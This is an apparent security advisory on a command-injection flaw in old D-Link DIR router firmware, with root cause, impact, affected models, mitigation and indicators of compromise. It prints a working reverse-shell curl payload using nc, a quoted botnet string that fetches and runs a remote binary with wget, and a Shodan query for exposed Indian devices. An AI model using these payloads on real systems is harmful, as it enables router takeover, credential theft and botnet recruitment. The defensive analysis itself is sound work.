Technical Analysis of CVE-2025-29635

Root Cause: The cgibin Binary

We extracted the firmware using binwalk and focused our analysis on the /htdocs/cgibin executable. Using Ghidra to decompile the MIPS-based binary, I located the function responsible for handling the config_test.cgi request. The logic retrieves the service parameter from the POST body and concatenates it into a command string intended for system() or popen().

# Conceptual representation of the vulnerable C logic found in cgibin
The binary takes the 'service' POST parameter and executes it directly
service_param = get_cgi_var("service") sprintf(command_buffer, "/etc/scripts/test_service.sh %s &", service_param) system(command_buffer)

Because there is no whitelist of allowed service names or any sanitization of characters like &, |, or ;, the attacker gains full control over the execution flow. I observed that the binary runs with the permissions of the web server, which, on these legacy BusyBox-based systems, is almost always root. This bypasses all internal security controls and provides a direct path to a reverse shell.

Attack Vector and Complexity

The attack vector is network-bound (AV:N) and requires low complexity (AC:L). No user interaction is required (UI:N), and no privileges are needed (PR:N). This makes it a prime target for automated botnets. During our testing, we verified that the exploit works even if the "Remote Management" feature is disabled on the WAN side, provided the attacker has gained a foothold within the local network (LAN) or if the ISP's NAT configuration inadvertently exposes the management port.

I used the following nmap command to identify potentially vulnerable targets in a controlled lab environment. The goal was to fingerprint the specific D-Link headers that appear when the cgibin interface is active.

$ nmap -p 80,443,8080 --script http-fingerprint --script-args "http-fingerprint.test-all" 192.168.1.1 | grep -i "D-Link"
Output shows: HTTP-Fingerprint: D-Link DIR-615 / DIR-600 (cgibin)

Exploitation and Proof of Concept

Gaining Remote Access

To demonstrate the impact, I crafted a payload to trigger a reverse shell. The target was a DIR-615 running firmware version 20.x. By sending a POST request to the vulnerable CGI script, we can force the router to connect back to an attacker-controlled listener. In India, we frequently see these devices configured with "Remote Management" on port 8080 to allow local ISPs to troubleshoot issues without visiting the customer premise. For organizations looking to replace these insecure methods, implementing a browser based SSH client provides a much more resilient alternative for managing remote infrastructure.

$ curl -v -X POST "http://192.168.1.1:8080/cgibin/config_test.cgi" \
-d "service=;nc -e /bin/sh 10.0.0.5 4444;"

On the listener side (10.0.0.5), I received a root shell immediately. The lack of iptables rules or any modern endpoint protection on these devices means the shell is completely unrestricted. I could then inspect the /var/config/nvram file, which contains cleartext credentials for the PPPoE connection and the Wi-Fi WPA2 keys.

Payload Analysis and Persistence

Botnets like Mirai and Mozi utilize this specific vulnerability to download MIPS-compiled binaries. I observed a common pattern where the attacker uses wget or tftp to pull a secondary stage payload. Since the /tmp directory is usually mounted as tmpfs (RAM-based), the malware must modify the startup scripts in /etc/config/ to ensure persistence across reboots, though many simply re-infect the device after every power cycle given the high density of vulnerable targets.

# Typical botnet infection string observed in logs
POST /cgibin/config_test.cgi HTTP/1.1 Host:  Content-Length: 68
service=;wget http://45.x.x.x/mips -O /tmp/m;chmod +x /tmp/m;/tmp/m;

Impact Assessment and Severity

CVSS Score and Risk Rating

We have assigned this vulnerability a CVSS v3.1 base score of 9.8 (Critical). This flaw is a classic example of the risks highlighted in the OWASP Top 10. The breakdown is as follows:

• Confidentiality: High. Full access to internal configuration, ISP credentials, and local traffic.
• Integrity: High. Ability to modify DNS settings to redirect users to phishing sites (DNS Hijacking).
• Availability: High. The device can be bricked or used in DDoS attacks, exhausting the user's bandwidth.

For an Indian SME, the impact extends beyond technical failure. Under the Digital Personal Data Protection (DPDP) Act 2023, failing to secure infrastructure that handles or provides access to personal data can result in significant penalties. If an EoL router is used as the primary gateway for an office, and a breach occurs via CVE-2025-29635, the organization may be found negligent in its "duty to take reasonable security safeguards" under Section 8 of the Act.

Denial of Service (DoS) Potential

Beyond RCE, the vulnerability can be used to trigger a kernel panic. By injecting a loop that exhausts the limited memory (often only 32MB or 64MB on these DIR models), an attacker can effectively take the network offline. This is particularly disruptive for small businesses relying on these routers for POS (Point of Sale) systems or CCTV connectivity.

Affected Systems and Software Versions

Vulnerable Product List

The following D-Link DIR-series routers are confirmed to be vulnerable. Note that all of these reached End-of-Support (EoS) status between 2018 and 2021.

• DIR-600: All hardware revisions, all firmware versions.
• DIR-615: Hardware revisions T1, U1, and older. Widely used in India by local broadband providers.
• DIR-645: All versions.
• DIR-815: Specific older revisions using the cgibin architecture.

Identifying Vulnerable Infrastructure

If you are managing a distributed network, you can use Shodan to identify exposed assets. I recommend searching for the specific Server header or the presence of the cgibin path. For Indian organizations, filtering by country code 'IN' provides a focused view of the local risk.

# Shodan search for vulnerable D-Link devices in India
shodan search "product:D-Link country:IN port:8080" --fields ip_str,city,org

I also recommend checking the physical sticker on the bottom of the router. If the hardware revision is listed as DIR-615 / HW: T1 or DIR-600 / HW: B1, the device is inherently insecure and should be replaced immediately, regardless of the firmware version currently installed.

Remediation and Mitigation Strategies

The Reality of EoL Hardware

D-Link has officially stated that they will not release patches for these models. This is "Legacy Debt" in its purest form. There is no official security update to download. Any "firmware updates" found on third-party sites should be treated with extreme caution as they are often backdoored or contain older vulnerabilities like CVE-2024-3273.

Temporary Workarounds

If immediate replacement is not possible due to budget constraints (e.g., a small educational institution in a Tier-3 city), I recommend the following emergency hardening steps:

• Disable Remote Management: Ensure that port 80 or 8080 is not accessible from the WAN side. This is the primary entry point for CVE-2025-29635.
• Implement IP Whitelisting: If remote access is required, restrict it to a specific static IP via the router's Access Control List (ACL).
• Disable UPnP: Universal Plug and Play can often open ports automatically, exposing the vulnerable CGI interface.
• Segment the Network: Move the router behind a modern firewall or a Linux-based gateway (like pfSense or an OpenWrt-compatible device) that can inspect and drop malicious POST requests.

Applying OpenWrt (Where Applicable)

For some DIR-615 revisions, it is possible to flash OpenWrt, which replaces the vulnerable cgibin with a modern, patched LuCI interface. I have successfully recovered several DIR-615 units by flashing a minimal OpenWrt build, though this requires technical expertise and carries the risk of bricking the device.

# Example of checking if a device is in recovery mode for TFTP flashing
$ ping 192.168.0.1
If TTL=100, the bootloader is waiting for a firmware image via TFTP
$ tftp 192.168.0.1 tftp> mode octet tftp> put openwrt-23.05-ramips-rt305x-dlink_dir-615-t1-squashfs-factory.bin

Detection and Monitoring

Indicators of Compromise (IoCs)

We have identified several IoCs that suggest a device has been compromised via CVE-2025-29635. Security teams should monitor for the following:

• Outbound Traffic on Port 6667 (IRC): Many legacy botnets use IRC for Command and Control (C2).
• Unusual Processes: If you can gain shell access, check ps for processes with random names or those running from /tmp.
• DNS Changes: Unauthorized entries in the router's DNS settings, often pointing to rogue resolvers in Eastern Europe or Russia.
• High CPU Usage: Constant 100% CPU utilization, causing slow web interface response, often indicative of a crypto-miner or DDoS agent.

Updating IDS/IPS Signatures

I have developed a Snort rule to detect exploitation attempts. This rule looks for the config_test.cgi path combined with shell metacharacters in the POST body. To scale this across an enterprise, integrating these rules into a SIEM for threat detection is essential for visibility.